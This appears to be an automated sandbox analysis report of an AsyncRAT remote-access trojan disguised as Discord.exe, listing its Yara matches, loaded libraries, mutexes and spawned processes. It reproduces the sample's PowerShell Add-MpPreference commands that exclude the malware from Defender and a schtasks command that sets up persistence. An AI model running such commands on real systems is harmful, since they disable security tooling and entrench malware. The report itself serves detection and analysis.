                    Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: s3OBQLA3xR.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeCode function: 0_2_00007FFD9B7E23610_2_00007FFD9B7E2361
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeCode function: 0_2_00007FFD9B7E16E90_2_00007FFD9B7E16E9
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeCode function: 0_2_00007FFD9B7E6E420_2_00007FFD9B7E6E42
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeCode function: 0_2_00007FFD9B7E60960_2_00007FFD9B7E6096
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeCode function: 0_2_00007FFD9B7EA9180_2_00007FFD9B7EA918
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeCode function: 0_2_00007FFD9B7E20C10_2_00007FFD9B7E20C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 15_2_00007FFD9B7D16E915_2_00007FFD9B7D16E9
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 15_2_00007FFD9B7D0E5E15_2_00007FFD9B7D0E5E
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 15_2_00007FFD9B7D20C115_2_00007FFD9B7D20C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 16_2_00007FFD9B7C16E916_2_00007FFD9B7C16E9
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 16_2_00007FFD9B7C0E5E16_2_00007FFD9B7C0E5E
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 16_2_00007FFD9B7C20C116_2_00007FFD9B7C20C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 17_2_00007FFD9B8016E917_2_00007FFD9B8016E9
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 17_2_00007FFD9B800E5E17_2_00007FFD9B800E5E
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 17_2_00007FFD9B8020C117_2_00007FFD9B8020C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 18_2_00007FFD9B7D16E918_2_00007FFD9B7D16E9
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 18_2_00007FFD9B7D0E5E18_2_00007FFD9B7D0E5E
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 18_2_00007FFD9B7D20C118_2_00007FFD9B7D20C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 20_2_00007FFD9B7E16E920_2_00007FFD9B7E16E9
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 20_2_00007FFD9B7E0E5E20_2_00007FFD9B7E0E5E
                    Source: s3OBQLA3xR.exe, 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
                    Source: s3OBQLA3xR.exe, 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
                    Source: s3OBQLA3xR.exeBinary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
                    Source: s3OBQLA3xR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: s3OBQLA3xR.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: s3OBQLA3xR.exe, sobWCqEaS5.csCryptographic APIs: 'TransformFinalBlock'
                    Source: s3OBQLA3xR.exe, U9pHMOisPp.csCryptographic APIs: 'TransformFinalBlock'
                    Source: s3OBQLA3xR.exe, U9pHMOisPp.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Discord.exe.0.dr, sobWCqEaS5.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Discord.exe.0.dr, U9pHMOisPp.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Discord.exe.0.dr, U9pHMOisPp.csCryptographic APIs: 'TransformFinalBlock'
                    Source: s3OBQLA3xR.exe, 1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.csBase64 encoded string: 'N+J/cgk6Ux7/+LR5tyAA4QxisYq+V+KiybXR0C8o1/0ijtAO697n9uiUUeBx/JEW'
                    Source: Discord.exe.0.dr, 1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.csBase64 encoded string: 'N+J/cgk6Ux7/+LR5tyAA4QxisYq+V+KiybXR0C8o1/0ijtAO697n9uiUUeBx/JEW'
                    Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@21/21@2/2
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile created: C:\Users\user\AppData\Roaming\Discord.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeMutant created: \Sessions\1\BaseNamedObjects\miQ2yTLyupQ9Eve0
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                    Source: s3OBQLA3xR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: s3OBQLA3xR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: s3OBQLA3xR.exeReversingLabs: Detection: 76%
                    Source: s3OBQLA3xR.exeVirustotal: Detection: 65%
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeFile read: C:\Users\user\Desktop\s3OBQLA3xR.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\s3OBQLA3xR.exe "C:\Users\user\Desktop\s3OBQLA3xR.exe"
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Discord.exe "C:\Users\user\AppData\Roaming\Discord.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Discord.exe "C:\Users\user\AppData\Roaming\Discord.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
